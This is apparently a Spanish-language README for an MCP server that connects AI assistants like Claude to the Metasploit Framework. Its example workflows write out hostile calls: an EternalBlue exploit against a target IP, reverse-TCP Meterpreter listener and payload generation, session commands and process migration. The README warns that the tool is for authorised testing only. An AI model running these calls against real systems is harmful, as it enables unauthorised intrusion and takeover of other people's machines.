local-only server
The server can only run on the client’s local machine because it depends on local resources.
Integrations
Provides a bridge to the Metasploit Framework penetration testing platform, enabling exploitation workflows, payload generation and execution, post-exploitation tools, listener management, and auxiliary module support.
Servidor MCP de Metasploit
Un servidor de Protocolo de Contexto de Modelo (MCP) para la integración de Metasploit Framework.
Descripción
Este servidor MCP conecta modelos de lenguaje extensos como Claude con la plataforma de pruebas de penetración Metasploit Framework. Permite a los asistentes de IA acceder y controlar dinámicamente la funcionalidad de Metasploit mediante herramientas estandarizadas, lo que facilita una interfaz de lenguaje natural para flujos de trabajo complejos de pruebas de seguridad.
Características
Generación y ejecución de carga útil
- generate_payload : Genera archivos de carga útil mediante Metasploit RPC (guarda los archivos localmente)
- execute_local_program : ejecuta un programa guardado localmente (por ejemplo, cargas útiles generadas)
Flujo de trabajo de explotación
- list_exploits : busca y enumera los módulos de explotación de Metasploit disponibles
- list_payloads : busca y enumera los módulos de carga útil de Metasploit disponibles
- run_exploit : Configurar y ejecutar un exploit contra un objetivo
- list_active_sessions : Muestra las sesiones actuales de Metasploit
- send_session_command : Ejecutar un comando en una sesión activa
Herramientas de post-explotación
- get_system_info : Recuperar información del sistema de una sesión de Meterpreter
- get_user_id : Obtener el contexto de usuario actual de una sesión
- list_processes : enumera los procesos que se están ejecutando en el sistema de destino
- migration_process : Mover una sesión de Meterpreter a otro proceso
- filesystem_list : enumera los archivos en un directorio en el sistema de destino
Gestión de oyentes
- list_listeners : muestra todos los controladores activos y trabajos en segundo plano
- start_listener : Crea un nuevo multi/handler para recibir conexiones
- stop_job : Finaliza cualquier trabajo o controlador en ejecución
Soporte de módulo auxiliar
- run_auxiliary_module : Ejecuta cualquier módulo auxiliar de Metasploit con opciones
Prerrequisitos
- Metasploit Framework instalado y msfrpcd ejecutándose
- Python 3.10 o superior
- Paquetes de Python necesarios (consulte requirements.txt)
Instalación
- Clonar este repositorio
- Instalar dependencias:Copy
- Configurar variables de entorno (opcional):Copy
Uso
Inicie el servicio RPC de Metasploit:
Para la integración de Claude Desktop, configure claude_desktop_config.json
:
Consideraciones de seguridad
⚠️ ADVERTENCIA DE SEGURIDAD IMPORTANTE :
Esta herramienta proporciona acceso directo a las capacidades de Metasploit Framework, que incluyen potentes funciones de explotación. Úsela con responsabilidad y solo en entornos donde tenga permiso explícito para realizar pruebas de seguridad.
- Siempre valide y revise todos los comandos antes de ejecutarlos
- Ejecutar únicamente en entornos de prueba segregados o con la autorización adecuada
- Tenga en cuenta que los comandos posteriores a la explotación pueden provocar modificaciones significativas del sistema.
Flujos de trabajo de ejemplo
Explotación básica
- Lista de exploits disponibles:
list_exploits("ms17_010")
- Seleccione y ejecute un exploit:
run_exploit("exploit/windows/smb/ms17_010_eternalblue", "192.168.1.100", 445)
- Lista de sesiones:
list_active_sessions()
- Ejecutar comandos:
send_session_command(1, "whoami")
Post-explotación
- Obtener información del sistema:
get_system_info(1)
- Lista de procesos en ejecución:
list_processes(1)
- Migrar a un proceso más estable:
migrate_process(1, 1234)
- Explorar el sistema de archivos:
filesystem_list(1, "C:\\Users")
Gestión de controladores
- Iniciar un oyente:
start_listener("windows/meterpreter/reverse_tcp", "192.168.1.10", 4444)
- Lista de controladores activos:
list_listeners()
- Generar una carga útil:
generate_payload("windows/meterpreter/reverse_tcp", "exe", {"LHOST": "192.168.1.10", "LPORT": 4444})
- Detener un controlador:
stop_job(1)
Opciones de configuración
Directorio de guardado de carga útil
De forma predeterminada, las cargas útiles generadas con generate_payload
se guardan en un directorio payloads
en su carpeta de inicio ( ~/payloads
o C:\Users\YourUsername\payloads
). Puede personalizar esta ubicación configurando la variable de entorno PAYLOAD_SAVE_DIR
.
Configuración de la variable de entorno:
- Ventanas (PowerShell) :Copy
- Windows (Símbolo del sistema) :Copy
- Linux/macOS :Copy
- En la configuración de Claude Desktop :Copy
Nota: Si especifica una ruta personalizada, asegúrese de que exista o de que la aplicación tenga permiso para crearla. Si la ruta no es válida, la generación de la carga útil podría fallar.
Licencia
Apache 2.0
This server cannot be installed
Proporciona un puente entre los modelos de lenguaje grandes y el marco Metasploit, lo que permite a los asistentes de IA acceder y controlar la funcionalidad de pruebas de penetración a través del lenguaje natural.